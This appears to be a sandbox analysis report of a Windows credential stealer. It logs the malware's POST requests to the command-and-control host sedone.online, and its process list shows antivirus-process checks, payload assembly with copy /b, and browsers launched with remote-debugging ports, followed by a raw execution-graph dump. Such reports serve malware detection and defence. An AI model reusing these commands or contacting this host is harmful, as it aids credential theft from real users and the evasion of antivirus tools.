Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:54 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----0ZUSR1VAI58QQI5XT2DJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 2449
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:54 UTC | 2449 | OUT | Data Ascii: ------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------0ZUSR1VAI58QQI5XT2DJCont
2024-12-16 12:47:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 49872 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:55 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Y58GDTJM7GVAAAIE3WBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 6533
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:55 UTC | 6533 | OUT | Data Ascii: ------Y58GDTJM7GVAAAIE3WBAContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------Y58GDTJM7GVAAAIE3WBAContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------Y58GDTJM7GVAAAIE3WBACont
2024-12-16 12:47:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 49873 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:57 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2D2DJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 3269
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:57 UTC | 3269 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74
Data Ascii: ------BIM7Y5P8Q9RIMYC2D2DJContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------BIM7Y5P8Q9RIMYC2D2DJContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------BIM7Y5P8Q9RIMYC2D2DJCont
2024-12-16 12:47:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49874 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:58 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----00HDTR9ZC2VAAIE3O8YC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 11445
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:58 UTC | 11445 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74
Data Ascii: ------00HDTR9ZC2VAAIE3O8YCContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------00HDTR9ZC2VAAIE3O8YCContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------00HDTR9ZC2VAAIE3O8YCCont
2024-12-16 12:47:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0



Target ID:0
Start time:07:45:52
Start date:16/12/2024
Path:C:\Users\user\Desktop\nB52P46OJD.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\nB52P46OJD.exe"
Imagebase:0x400000
File size:1'357'367 bytes
MD5 hash:C6E90B3A98ECB4AB74A9AAF8155D1BC0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:07:45:53
Start date:16/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:07:45:53
Start date:16/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:07:45:56
Start date:16/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x5d0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:07:45:56
Start date:16/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x460000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:07:45:56
Start date:16/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x5d0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:07:45:56
Start date:16/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x460000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:07:45:58
Start date:16/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 615578
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:07:45:58
Start date:16/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "applied" Manually
Imagebase:0x460000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:07:45:58
Start date:16/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:07:45:58
Start date:16/12/2024
Path:C:\Users\user\AppData\Local\Temp\615578\Participating.com
Wow64 process (32bit):true
Commandline:Participating.com w
Imagebase:0xce0000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:false

Target ID:12
Start time:07:45:58
Start date:16/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xab0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                Start time:07:46:53
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                Start time:07:46:54
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                Start time:07:47:08
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                Start time:07:47:09
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                Start time:07:47:14
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                                Start time:07:47:14
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
                                                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Has exited:true

Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:27
3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 
4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 
3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API 
calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 